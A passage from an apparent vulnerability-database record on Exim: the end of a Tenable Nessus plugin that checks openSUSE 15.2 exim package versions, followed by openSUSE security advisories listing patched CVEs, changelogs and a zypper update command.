Previously the check for any unsuccessful\n recipients did not notice the limit, and erroneously\n found still-pending ones.\n\n - Pipeline CHUNKING command and data together, on kernels\n that support MSG_MORE. Only in-clear (not on TLS\n connections).\n\n - Avoid using a temporary file during transport using\n dkim. Unless a transport-filter is involved we can\n buffer the headers in memory for creating the signature,\n and read the spool data file once for the signature and\n again for transmission.\n\n - Enable use of sendfile in Linux builds as default. It\n was disabled in 4.77 as the kernel support then wasn't\n solid, having issues in 64bit mode. Now, it's been long\n enough. Add support for FreeBSD also.\n\n - Add commandline_checks_require_admin option.\n\n - Do pipelining under TLS.\n\n - For the 'sock' variant of the malware scanner interface,\n accept an empty cmdline element to get the documented\n default one. Previously it was inaccessible.\n\n - Prevent repeated use of -p/-oMr\n\n - DKIM: enforce the DNS pubkey record 'h' permitted-hashes\n optional field, if present.\n\n - DKIM: when a message has multiple signatures matching an\n identity given in dkim_verify_signers, run the dkim acl\n once for each.\n\n - Support IDNA2008.\n\n - The path option on a pipe transport is now expanded\n before use\n\n - Have the EHLO response advertise VRFY, if there is a\n vrfy ACL defined.\n\n - Several bug fixes\n\n - Fix for buffer overflow in base64decode() (boo#1079832\n CVE-2018-6789)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1079832\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1171490\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1171877\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1173693\");\n 
script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1185631\");\n script_set_attribute(attribute:\"see_also\", value:\"https://reproducible-builds.org/specs/source-date-epoch/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected exim packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-15846\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-28026\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim 4.87 - 4.91 Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/05/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:exim-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:exim-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:eximon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:eximon-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:eximstats-html\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.2\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.2\", reference:\"exim-4.94.2-lp152.8.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"exim-debuginfo-4.94.2-lp152.8.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"exim-debugsource-4.94.2-lp152.8.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"eximon-4.94.2-lp152.8.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", 
reference:\"eximon-debuginfo-4.94.2-lp152.8.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"eximstats-html-4.94.2-lp152.8.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim / exim-debuginfo / exim-debugsource / eximon / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "suse": [{"lastseen": "2017-08-29T21:10:26", "description": "This update for exim fixes the following issues:\n\n Changes in exim:\n - specify users with ref:mail, to make them dynamic. (boo#1046971)\n\n - CVE-2017-1000369: Fixed memory leaks that could be exploited to \"stack\n crash\" local privilege escalation (boo#1044692)\n - Require user(mail) group(mail) to meet new users handling in TW.\n - Prerequire permissions (fixes rpmlint).\n\n - conditionally disable DANE on SuSE versions with OpenSSL < 1.0\n - CVE-2016-1531: when installed setuid root, allows local users to gain\n privileges via the perl_startup argument.\n - CVE-2016-9963: DKIM information leakage (boo#1015930)\n\n\n - Makefile tuning:\n + add sqlite support\n + disable WITH_OLD_DEMIME\n + enable AUTH_CYRUS_SASL\n + enable AUTH_TLS\n + enable SYSLOG_LONG_LINES\n + enable SUPPORT_PAM\n + MAX_NAMED_LIST=64\n + enable EXPERIMENTAL_DMARC\n + enable EXPERIMENTAL_EVENT\n + enable EXPERIMENTAL_PROXY\n + enable EXPERIMENTAL_CERTNAMES\n + enable EXPERIMENTAL_DSN\n + enable EXPERIMENTAL_DANE\n + enable EXPERIMENTAL_SOCKS\n + enable EXPERIMENTAL_INTERNATIONAL\n\n", "cvss3": {}, "published": "2017-08-29T18:39:29", "type": "suse", "title": "Security update for exim (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-1531", "CVE-2016-9963", "CVE-2017-1000369"], "modified": "2017-08-29T18:39:29", "id": "OPENSUSE-SU-2017:2289-1", "href": 
"http://lists.opensuse.org/opensuse-security-announce/2017-08/msg00072.html", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-06-20T18:15:03", "description": "This update for exim fixes the following issues:\n\n - CVE-2017-1000369: Fixed a memory leak in exim commandline handling,\n which could be used to exhaust memory and make "stack crash" attacks\n likely. (boo#1044692)\n\n", "cvss3": {}, "published": "2017-06-20T15:10:52", "type": "suse", "title": "Security update for exim (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2017-1000369"], "modified": "2017-06-20T15:10:52", "id": "OPENSUSE-SU-2017:1625-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-06/msg00020.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2016-09-04T12:08:03", "description": "This update to exim 4.86.2 fixes the following issues:\n\n * CVE-2016-1531: local privilege escalation for set-uid root exim when\n using 'perl_startup' (boo#968844)\n\n Important: Exim now cleans the complete execution environment by default.\n This affects Exim and subprocesses such as transports calling other\n programs. The following new options are supported to adjust this behaviour:\n * keep_environment\n * add_environment A warning will be printed upon startup if none of these\n are configured.\n\n Also includes upstream changes, improvements and bug fixes:\n * Support for using the system standard CA bundle.\n * New expansion items $config_file, $config_dir, containing the file and\n directory name of the main configuration file. 
Also $exim_version.\n * New \"malware=\" support for Avast.\n * New \"spam=\" variant option for Rspamd.\n * Assorted options on malware= and spam= scanners.\n * A commandline option to write a comment into the logfile.\n * A logging option for slow DNS lookups.\n * New ${env {<variable>}} expansion.\n * A non-SMTP authenticator using information from TLS client\n certificates.\n * Main option \"tls_eccurve\" for selecting an Elliptic Curve for TLS.\n * Main option \"dns_trust_aa\" for trusting your local nameserver at the\n same level as DNSSEC.\n\n", "cvss3": {}, "published": "2016-03-11T14:16:09", "type": "suse", "title": "Security update for exim (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-1531"], "modified": "2016-03-11T14:16:09", "id": "OPENSUSE-SU-2016:0721-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00026.html", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2022-04-18T12:40:27", "description": "An update that fixes 26 vulnerabilities is now available.\n\nDescription:\n\n This update for exim fixes the following issues:\n\n\n Exim was updated to exim-4.94.2\n\n security update (boo#1185631)\n\n * CVE-2020-28007: Link attack in Exim's log directory\n * CVE-2020-28008: Assorted attacks in Exim's spool directory\n * CVE-2020-28014: Arbitrary PID file creation\n * CVE-2020-28011: Heap buffer overflow in queue_run()\n * CVE-2020-28010: Heap out-of-bounds write in main()\n * CVE-2020-28013: Heap buffer overflow in parse_fix_phrase()\n * CVE-2020-28016: Heap out-of-bounds write in parse_fix_phrase()\n * CVE-2020-28015: New-line injection into spool header file (local)\n * CVE-2020-28012: Missing close-on-exec flag for privileged pipe\n * CVE-2020-28009: Integer overflow in get_stdinput()\n * CVE-2020-28017: Integer overflow in receive_add_recipient()\n * CVE-2020-28020: Integer overflow in receive_msg()\n * CVE-2020-28023: Out-of-bounds read in 
smtp_setup_msg()\n * CVE-2020-28021: New-line injection into spool header file (remote)\n * CVE-2020-28022: Heap out-of-bounds read and write in extract_option()\n * CVE-2020-28026: Line truncation and injection in spool_read_header()\n * CVE-2020-28019: Failure to reset function pointer after BDAT error\n * CVE-2020-28024: Heap buffer underflow in smtp_ungetc()\n * CVE-2020-28018: Use-after-free in tls-openssl.c\n * CVE-2020-28025: Heap out-of-bounds read in pdkim_finish_bodyhash()\n\n update to exim-4.94.1\n\n * Fix security issue in BDAT state confusion. Ensure we reset known-good\n where we know we need to not be reading BDAT data, as a general case\n fix, and move the places where we switch to BDAT mode until after\n various protocol state checks. Fixes CVE-2020-BDATA reported by Qualys.\n * Fix security issue in SMTP verb option parsing (CVE-2020-EXOPT)\n * Fix security issue with too many recipients on a message (to remove a\n known security problem if someone does set recipients_max to unlimited,\n or if local additions add to the recipient list). Fixes CVE-2020-RCPTL\n reported by Qualys.\n * Fix CVE-2020-28016 (PFPZA): Heap out-of-bounds write in\n parse_fix_phrase()\n * Fix security issue CVE-2020-PFPSN and guard against cmdline invoker\n providing a particularly obnoxious sender full name.\n * Fix Linux security issue CVE-2020-SLCWD and guard against PATH_MAX\n better.\n\n - bring back missing exim_db.8 manual page (fixes boo#1173693)\n\n - bring in changes from current +fixes (lots of taint check fixes)\n * Bug 1329: Fix format of Maildir-format filenames to match other mail-\n related applications. Previously an \"H\" was used where available info\n says that \"M\" should be, so change to match.\n * Bug 2587: Fix pam expansion condition. Tainted values are commonly\n used as arguments, so an implementation trying to copy these into a\n local buffer was taking a taint-enforcement trap. 
Fix by using\n dynamically created buffers.\n * Bug 2586: Fix listcount expansion operator. Using tainted arguments\n is reasonable, eg. to count headers. Fix by using dynamically created\n buffers rather than a local. Do similar fixes for ACL actions \"dcc\",\n \"log_reject_target\", \"malware\" and \"spam\"; the arguments are expanded\n so could be handling tainted values.\n * Bug 2590: Fix -bi (newaliases). A previous code rearrangement had\n broken the (no-op) support for this sendmail command. Restore it to\n doing nothing, silently, and returning good status.\n\n - update to exim 4.94\n * some transports now refuse to use tainted data in constructing their\n delivery location this WILL BREAK configurations which are not updated\n accordingly. In particular: any Transport use of $local_user which has\n been relying upon check_local_user far away in the Router to make it\n safe, should be updated to replace $local_user with $local_part_data.\n * Attempting to remove, in router or transport, a header name that ends\n with an asterisk (which is a standards-legal name) will now result in\n all headers named starting with the string before the asterisk being\n removed.\n\n - switch pretrans to use lua (fixes boo#1171877)\n\n\n - bring changes from current in +fixes branch\n (patch-exim-fixes-ee83de04d3087efaf808d1f2235a988275c2ee94)\n * fixes CVE-2020-12783 (boo#1171490)\n * Regard command-line recipients as tainted.\n * Bug 2489: Fix crash in the \"pam\" expansion condition.\n * Use tainted buffers for the transport smtp context.\n * Bug 2493: Harden ARC verify against Outlook, which has been seen to\n mix the ordering of its ARC headers. This caused a crash.\n * Bug 2492: Use tainted memory for retry record when needed. Previously\n when a new record was being constructed with information from the\n peer, a trap was taken.\n * Bug 2494: Unset the default for dmarc_tld_file.\n * Fix an uninitialised flag in early-pipelining. 
Previously connections\n could, depending on the platform, hang at the STARTTLS response.\n * Bug 2498: Reset a counter used for ARC verify before handling another\n message on a connection. Previously if one message had ARC headers\n and the following one did not, a crash could result when adding an\n Authentication-Results: header.\n * Bug 2500: Rewind some of the common-coding in string handling between\n the Exim main code and Exim-related utities.\n * Fix the variables set by the gsasl authenticator.\n * Bug 2507: Modules: on handling a dynamic-module (lookups) open failure,\n only retrieve the errormessage once.\n * Bug 2501: Fix init call in the heimdal authenticator. Previously it\n adjusted the size of a major service buffer; this failed because the\n buffer was in use at the time. Change to a compile-time increase in\n the buffer size, when this authenticator is compiled into exim.\n\n - update to exim 4.93.0.4 (+fixes release)\n * Avoid costly startup code when not strictly needed. This reduces time\n for some exim process initialisations. It does mean that the logging\n of TLS configuration problems is only done for the daemon startup.\n * Early-pipelining support code is now included unless disabled in\n Makefile.\n * DKIM verification defaults no long accept sha1 hashes, to conform to\n RFC 8301. They can still be enabled, using the dkim_verify_hashes main\n option.\n * Support CHUNKING from an smtp transport using a transport_filter, when\n DKIM signing is being done. Previously a transport_filter would\n always disable CHUNKING, falling back to traditional DATA.\n * Regard command-line receipients as tainted.\n * Bug 340: Remove the daemon pid file on exit, whe due to SIGTERM.\n * Bug 2489: Fix crash in the \"pam\" expansion condition. It seems that\n the PAM library frees one of the arguments given to it, despite the\n documentation. 
Therefore a plain malloc must be used.\n * Bug 2491: Use tainted buffers for the transport smtp context.\n Previously\n on-stack buffers were used, resulting in a taint trap when DSN\n information copied from a received message was written into the\n buffer.\n * Bug 2493: Harden ARC verify against Outlook, whick has been seen to\n mix the ordering of its ARC headers. This caused a crash.\n * Bug 2492: Use tainted memory for retry record when needed. Previously\n when a new record was being constructed with information from the\n peer, a trap was taken.\n * Bug 2494: Unset the default for dmarc_tld_file. Previously a naiive\n installation would get error messages from DMARC verify, when it hit\n the nonexistent file indicated by the default. Distros wanting DMARC\n enabled should both provide the file and set the option. Also enforce\n no DMARC verification for command-line sourced messages.\n * Fix an uninitialised flag in early-pipelining. Previously connections\n could, depending on the platform, hang at the STARTTLS response.\n * Bug 2498: Reset a counter used for ARC verify before handling another\n message on a connection. Previously if one message had ARC headers\n and the following one did not, a crash could result when adding an\n Authentication-Results: header.\n * Bug 2500: Rewind some of the common-coding in string handling between\n the Exim main code and Exim-related utities. The introduction of\n taint tracking also did many adjustments to string handling. Since\n then, eximon frequently terminated with an assert failure.\n * When PIPELINING, synch after every hundred or so RCPT commands sent\n and check for 452 responses. This slightly helps the inefficieny of\n doing a large alias-expansion into a recipient-limited target. The\n max_rcpt transport option still applies (and at the current default,\n will override the new feature). 
The check is done for either cause of\n synch, and forces a fast-retry of all 452'd recipients using a new\n MAIL FROM on the same connection. The new facility is not tunable at\n this time.\n * Fix the variables set by the gsasl authenticator. Previously a\n pointer to library live data was being used, so the results became\n garbage. Make copies while it is still usable.\n * Logging: when the deliver_time selector ise set, include the DT= field\n on delivery deferred (==) and failed (**) lines (if a delivery was\n attemtped). Previously it was only on completion (=>) lines.\n * Authentication: the gsasl driver not provides the $authN variables in\n time for the expansion of the server_scram_iter and server_scram_salt\n options.\n\n spec file cleanup to make update work\n - add docdir to spec\n\n - update to exim 4.93\n * SUPPORT_DMARC replaces EXPERIMENTAL_DMARC\n * DISABLE_TLS replaces SUPPORT_TLS\n * Bump the version for the local_scan API.\n * smtp transport option hosts_try_fastopen defaults to \"*\".\n * DNSSec is requested (not required) for all queries. 
(This seemes to\n ask for trouble if your resolver is a systemd-resolved.)\n * Generic router option retry_use_local_part defaults to \"true\" under\n specific pre-conditions.\n * Introduce a tainting mechanism for values read from untrusted sources.\n * Use longer file names for temporary spool files (this avoids name\n conflicts with spool on a shared file system).\n * Use dsn_from main config option (was ignored previously).\n\n - update to exim 4.92.3\n * CVE-2019-16928: fix against Heap-based buffer overflow in\n string_vformat, remote code execution seems to be possible\n\n - update to exim 4.92.2\n * CVE-2019-15846: fix against remote attackers executing arbitrary code\n as root via a trailing backslash\n\n - update to exim 4.92.1\n * CVE-2019-13917: Fixed an issue with ${sort} expansion which could allow\n remote attackers to execute other programs with root privileges\n (boo#1142207)\n\n - spec file cleanup\n * fix DANE inclusion guard condition\n * re-enable i18n and remove misleading comment\n * EXPERIMENTAL_SPF is now SUPPORT_SPF\n * DANE is now SUPPORT_DANE\n\n - update to exim 4.92\n * ${l_header:<name>} expansion\n * ${readsocket} now supports TLS\n * \"utf8_downconvert\" option (if built with SUPPORT_I18N)\n * \"pipelining\" log_selector\n * JSON variants for ${extract } expansion\n * \"noutf8\" debug option\n * TCP Fast Open support on MacOS\n * CVE-2019-10149: Fixed a Remote Command Execution (boo#1136587)\n - add workaround patch for compile time error on missing printf format\n annotation (gnu_printf.patch)\n\n - update to 4.91\n * DEFER rather than ERROR on redis cluster MOVED response.\n * Catch and remove uninitialized value warning in exiqsumm\n * Disallow '/' characters in queue names specified for the \"queue=\" ACL\n modifier. 
This matches the restriction on the commandline.\n * Fix pgsql lookup for multiple result-tuples with a single column.\n Previously only the last row was returned.\n * Bug 2217: Tighten up the parsing of DKIM signature headers.\n * Bug 2215: Fix crash associated with dnsdb lookup done from DKIM ACL.\n * Fix issue with continued-connections when the DNS shifts unreliably.\n * Bug 2214: Fix SMTP responses resulting from non-accept result of MIME\n ACL.\n * The \"support for\" informational output now, which built with Content\n Scanning support, has a line for the malware scanner interfaces\n compiled in. Interface can be individually included or not at build\n time.\n * The \"aveserver\", \"kavdaemon\" and \"mksd\" interfaces are now not included\n by the template makefile \"src/EDITME\". The \"STREAM\" support for an\n older ClamAV interface method is removed.\n * Bug 2223: Fix mysql lookup returns for the no-data case (when the\n number of rows affected is given instead).\n * The runtime Berkeley DB library version is now additionally output by\n \"exim -d -bV\". 
Previously only the compile-time version was shown.\n * Bug 2230: Fix cutthrough routing for nonfirst messages in an initiating\n SMTP connection.\n * Bug 2229: Fix cutthrough routing for nonstandard port numbers defined\n by routers.\n * Bug 2174: A timeout on connect for a callout was also erroneously seen\n as a timeout on read on a GnuTLS initiating connection, resulting in\n the initiating connection being dropped.\n * Relax results from ACL control request to enable cutthrough, in\n unsupported situations, from error to silently (except under debug)\n ignoring.\n * Fix Buffer overflow in base64d() (CVE-2018-6789)\n * Fix bug in DKIM verify: a buffer overflow could corrupt the malloc\n metadata, resulting in a crash in free().\n * Fix broken Heimdal GSSAPI authenticator integration.\n * Bug 2113: Fix conversation closedown with the Avast malware scanner.\n * Bug 2239: Enforce non-usability of control=utf8_downconvert in the mail\n ACL.\n * Speed up macro lookups during configuration file read, by skipping non-\n macro text after a replacement (previously it was only once per line)\n and by skipping builtin macros when searching for an uppercase lead\n character.\n * DANE support moved from Experimental to mainline. The Makefile control\n for the build is renamed.\n * Fix memory leak during multi-message connections using STARTTLS.\n * Bug 2236: When a DKIM verification result is overridden by ACL, DMARC\n reported the original. 
Fix to report (as far as possible) the ACL\n result replacing the original.\n * Fix memory leak during multi-message connections using STARTTLS under\n OpenSSL\n * Bug 2242: Fix exim_dbmbuild to permit directoryless filenames.\n * Fix utf8_downconvert propagation through a redirect router.\n * Bug 2253: For logging delivery lines under PRDR, append the overall\n DATA response info to the (existing) per-recipient response info for\n the \"C=\" log element.\n * Bug 2251: Fix ldap lookups that return a single attribute having zero-\n length value.\n * Support Avast multiline protocol, this allows passing flags to newer\n versions of the scanner.\n * Ensure that variables possibly set during message acceptance are\n marked dead before release of memory in the daemon loop.\n * Bug 2250: Fix a longstanding bug in heavily-pipelined SMTP input (such\n as a multi-recipient message from a mailinglist manager).\n * The (EXPERIMENTAL_DMARC) variable $dmarc_ar_header is withdrawn, being\n replaced by the ${authresults } expansion.\n * Bug 2257: Fix pipe transport to not use a socket-only syscall.\n * Set a handler for SIGTERM and call exit(3) if running as PID 1. 
This\n allows proper process termination in container environments.\n * Bug 2258: Fix spool_wireformat in combination with LMTP transport.\n Previously the \"final dot\" had a newline after it; ensure it is CR,LF.\n * SPF: remove support for the \"spf\" ACL condition outcome values\n \"err_temp\" and \"err_perm\", deprecated since 4.83 when the RFC-defined\n words \" temperror\" and \"permerror\" were introduced.\n * Re-introduce enforcement of no cutthrough delivery on transports having\n transport-filters or DKIM-signing.\n * Cutthrough: for a final-dot response timeout (and nonunderstood\n responses) in defer=pass mode supply a 450 to the initiator.\n Previously the message would be spooled.\n * DANE: add dane_require_tls_ciphers SMTP Transport option; if unset,\n tls_require_ciphers is used as before.\n * Malware Avast: Better match the Avast multiline protocol.\n * Fix reinitialisation of DKIM logging variable between messages.\n * Bug 2255: Revert the disable of the OpenSSL session caching.\n * Add util/renew-opendmarc-tlds.sh script for safe renewal of public\n suffix list.\n * DKIM: accept Ed25519 pubkeys in SubjectPublicKeyInfo-wrapped form,\n since the IETF WG has not yet settled on that versus the original\n \"bare\" representation.\n * Fix syslog logging for syslog_timestamp=no and log_selector +millisec.\n Previously the millisecond value corrupted the output. Fix also for\n syslog_pid=no and log_selector +pid, for which the pid corrupted the\n output.\n - Replace xorg-x11-devel by individual pkgconfig() buildrequires.\n - update to 4.90.1\n * Allow PKG_CONFIG_PATH to be set in Local/Makefile and use it correctly\n during configuration. Wildcards are allowed and expanded.\n * Shorten the log line for daemon startup by collapsing adjacent sets of\n identical IP addresses on different listening ports. 
Will also affect\n \"exiwhat\" output.\n * Tighten up the checking in isip4 (et al): dotted-quad components\n larger than 255 are no longer allowed.\n * Default openssl_options to include +no_ticket, to reduce load on\n peers. Disable the session-cache too, which might reduce our load.\n Since we currrectly use a new context for every connection, both as\n server and client, there is no benefit for these.\n * Add $SOURCE_DATE_EPOCH support for reproducible builds, per spec at\n <https://reproducible-builds.org/specs/source-date-epoch/>.\n * Fix smtp transport use of limited max_rcpt under mua_wrapper.\n Previously the check for any unsuccessful recipients did not notice\n the limit, and erroneously found still-pending ones.\n * Pipeline CHUNKING command and data together, on kernels that support\n MSG_MORE. Only in-clear (not on TLS connections).\n * Avoid using a temporary file during transport using dkim. Unless a\n transport-filter is involved we can buffer the headers in memory for\n creating the signature, and read the spool data file once for the\n signature and again for transmission.\n * Enable use of sendfile in Linux builds as default. It was disabled in\n 4.77 as the kernel support then wasn't solid, having issues in 64bit\n mode. Now, it's been long enough. Add support for FreeBSD also.\n * Add commandline_checks_require_admin option.\n * Do pipelining under TLS.\n * For the \"sock\" variant of the malware scanner interface, accept an\n empty cmdline element to get the documented default one. 
Previously\n it was inaccessible.\n * Prevent repeated use of -p/-oMr\n * DKIM: enforce the DNS pubkey record \"h\" permitted-hashes optional\n field, if present.\n * DKIM: when a message has multiple signatures matching an identity\n given in dkim_verify_signers, run the dkim acl once for each.\n * Support IDNA2008.\n * The path option on a pipe transport is now expanded before use\n * Have the EHLO response advertise VRFY, if there is a vrfy ACL defined.\n - Several bug fixes\n - Fix for buffer overflow in base64decode() (boo#1079832 CVE-2018-6789)\n\n This update was imported from the openSUSE:Leap:15.2:Update update project.\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Backports SLE-15-SP2:\n\n zypper in -t patch openSUSE-2021-754=1", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-20T00:00:00", "type": "suse", "title": "Security update for exim (critical)", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": 
false}, "cvelist": ["CVE-2017-1000369", "CVE-2017-16943", "CVE-2017-16944", "CVE-2018-6789", "CVE-2019-10149", "CVE-2019-13917", "CVE-2019-15846", "CVE-2019-16928", "CVE-2020-12783", "CVE-2020-28007", "CVE-2020-28008", "CVE-2020-28009", "CVE-2020-28010", "CVE-2020-28011", "CVE-2020-28012", "CVE-2020-28013", "CVE-2020-28014", "CVE-2020-28015", "CVE-2020-28016", "CVE-2020-28017", "CVE-2020-28018", "CVE-2020-28019", "CVE-2020-28020", "CVE-2020-28021", "CVE-2020-28022", "CVE-2020-28023", "CVE-2020-28024", "CVE-2020-28025", "CVE-2020-28026"], "modified": "2021-05-20T00:00:00", "id": "OPENSUSE-SU-2021:0754-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/3FZPX7R5ELKQM2EW7W2JYZ7EFIIDTT4E/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-18T12:40:27", "description": "An update that fixes 26 vulnerabilities is now available.\n\nDescription:\n\n This update for exim fixes the following issues:\n\n\n Exim was updated to exim-4.94.2\n\n security update (boo#1185631)\n\n * CVE-2020-28007: Link attack in Exim's log directory\n * CVE-2020-28008: Assorted attacks in Exim's spool directory\n * CVE-2020-28014: Arbitrary PID file creation\n * CVE-2020-28011: Heap buffer overflow in queue_run()\n * CVE-2020-28010: Heap out-of-bounds write in main()\n * CVE-2020-28013: Heap buffer overflow in parse_fix_phrase()\n * CVE-2020-28016: Heap out-of-bounds write in parse_fix_phrase()\n * CVE-2020-28015: New-line injection into spool header file (local)\n * CVE-2020-28012: Missing close-on-exec flag for privileged pipe\n * CVE-2020-28009: Integer overflow in get_stdinput()\n * CVE-2020-28017: Integer overflow in receive_add_recipient()\n * CVE-2020-28020: Integer overflow in receive_msg()\n * CVE-2020-28023: Out-of-bounds read in smtp_setup_msg()\n * CVE-2020-28021: New-line injection into spool header file (remote)\n * CVE-2020-28022: Heap out-of-bounds read and write in extract_option()\n * 
CVE-2020-28026: Line truncation and injection in spool_read_header()\n * CVE-2020-28019: Failure to reset function pointer after BDAT error\n * CVE-2020-28024: Heap buffer underflow in smtp_ungetc()\n * CVE-2020-28018: Use-after-free in tls-openssl.c\n * CVE-2020-28025: Heap out-of-bounds read in pdkim_finish_bodyhash()\n\n update to exim-4.94.1\n\n * Fix security issue in BDAT state confusion. Ensure we reset known-good\n where we know we need to not be reading BDAT data, as a general case\n fix, and move the places where we switch to BDAT mode until after\n various protocol state checks. Fixes CVE-2020-BDATA reported by Qualys.\n * Fix security issue in SMTP verb option parsing (CVE-2020-EXOPT)\n * Fix security issue with too many recipients on a message (to remove a\n known security problem if someone does set recipients_max to unlimited,\n or if local additions add to the recipient list). Fixes CVE-2020-RCPTL\n reported by Qualys.\n * Fix CVE-2020-28016 (PFPZA): Heap out-of-bounds write in\n parse_fix_phrase()\n * Fix security issue CVE-2020-PFPSN and guard against cmdline invoker\n providing a particularly obnoxious sender full name.\n * Fix Linux security issue CVE-2020-SLCWD and guard against PATH_MAX\n better.\n\n - bring back missing exim_db.8 manual page (fixes boo#1173693)\n\n - bring in 